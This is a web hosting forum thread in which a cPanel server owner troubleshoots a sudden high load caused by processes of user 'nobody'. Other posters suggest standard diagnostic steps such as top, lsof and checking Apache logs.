Results 1 to 15 of 15
  1. #1
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955

    Horribly High Load

    Hello, my server is currently experiencing a load of 15.

    It use to average 0.00 and 0.01.

    How can I bring the load down. It shows user 'nobody' as using 121.21% CPU load.

    Nothing has changed within the last 3 weeks, and this just started occuring last night.

    Please, can anyone help?

  2. #2
    Join Date
    Jun 2002
    Location
    Portsmouth, VA
    Posts
    161
    You probably got a dos script or something dropped into your server. I do not know what IT is that you are referring, but you should run a top and make a not of the pid that is talking all the load. Then use lsof to breing up a list of open files and then kill the process.
    ---
    Jon Berry
    Proactive Server Management
    http://www.got-management.com

  3. #3
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    Quote Originally Posted by GOT
    You probably got a dos script or something dropped into your server. I do not know what IT is that you are referring, but you should run a top and make a not of the pid that is talking all the load. Then use lsof to breing up a list of open files and then kill the process.
    When I said:

    "It use to average 0.00 and 0.01", I meant the over all server load.

    When I said:
    "It shows user 'nobody' as using 121.21% CPU load.", I meant WHM's "CPU/Memory/MySQL Usage" Server Status page.

  4. #4
    Join Date
    Jun 2002
    Location
    Portsmouth, VA
    Posts
    161
    Understood. You need to identify specifically which process is causing the laod. To do that, from shell (ssh) run the top command. It shows the users that own the process and if load is that bad it sould be at or near the top. It also shows the pid for the process.

    Once you have the pid, quit top and run

    lsof -p <pid>|more

    You will see a bunch of files but you are specifically looking for something probably in the tmp directory. If you can identify the script itself, then kill the process with:

    kill -9 <pid>

    Then, if you are interested, the forensics begin. Best bet is to install mod_security if you have not already.
    ---
    Jon Berry
    Proactive Server Management
    http://www.got-management.com

  5. #5
    Try going into WHM:

    Try killing the prccess thru System Health ----> Show current CPU usage look for Nobody process and kill it

    Have you tried identifing the source thru
    Server Status ----> Apache Status ?

    Also did you
    Enable mod_userdir Protection. on the server ?
    Last edited by webchatsupport; 12-11-2005 at 11:41 PM.

  6. #6
    Check the PID on cpu usage, find the user by looking through your currently running processes, and eliminate either the user or the source of the issue.
    FrogJumper.com, Superb Cpanel Web Hosting.
    Excellent, High Paying Affiliate Program.

  7. #7
    Yeah, it looks like you are running Cpanel, so those steps should be rather easy. Go to system health, find the PID through CPU usage, then run a search on your current running processes to find the user.
    FrogJumper.com, Superb Cpanel Web Hosting.
    Excellent, High Paying Affiliate Program.

  8. #8
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    I've killed all processes being run by user 'nobody', and it's stabled out.

  9. #9
    You may still run into issues once the user starts utlizing whatever script that caused this problem in the first place, again.

    Most likely it was some sort of PHP or CGI mail script using nobody as a sender. You can eliminate this problem in your tweak security settings, however you'll run into a slew of other issues if you all ready have users doing this in a responsible way.

    I would suggest tracking the person and suspending them until they agree not to do what they were doing.
    FrogJumper.com, Superb Cpanel Web Hosting.
    Excellent, High Paying Affiliate Program.

  10. #10
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    That's a pain in the ***.

  11. #11
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    Quote Originally Posted by goodydomains
    You may still run into issues once the user starts utlizing whatever script that caused this problem in the first place, again.

    Most likely it was some sort of PHP or CGI mail script using nobody as a sender. You can eliminate this problem in your tweak security settings, however you'll run into a slew of other issues if you all ready have users doing this in a responsible way.

    I would suggest tracking the person and suspending them until they agree not to do what they were doing.
    All the people on my server are either family members, or friends.

    I monitor every file that gets put in my server each morning. There's no script utilizing 'nobody' right now but what I have installed, and a few of their forums. And I know their forums aren't utilizing it, and my programs aren't.

    Like I said.

    My servers load used to be around 0.01 and 0.00 all the time. It just happened by some fluke coincidence today, that user 'nobody' decided to be a bitch.

  12. #12
    Ah, I just assumed it was a business server with mutliple unknown clients. Hope everything works out with the server from now on.
    FrogJumper.com, Superb Cpanel Web Hosting.
    Excellent, High Paying Affiliate Program.

  13. #13
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    Quote Originally Posted by goodydomains
    Ah, I just assumed it was a business server with mutliple unknown clients. Hope everything works out with the server from now on.
    Well, it went from 14.31 to 0.01, so I think that's a step in the right direction.

    Thanks everyone for your help.

    Now I'm gonna go look for a winchestor 30/30 to blow my brains out for being such a n00ber.

    Take care, and thanks again.

  14. #14
    Join Date
    Nov 2005
    Location
    BC, Canada
    Posts
    773
    So there were no downloaded scripts that were eating resources? You might want to grep the Apache access_log for "wget" to be on the safe side.
    || Higher Intellect || Half a million documents and climbing.
    || CupidClick Dating || Just for Canadians.

  15. #15
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    Quote Originally Posted by netfreak
    So there were no downloaded scripts that were eating resources? You might want to grep the Apache access_log for "wget" to be on the safe side.
    I'm positive there isn't any. I'll check, just in case.

    Thanks!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •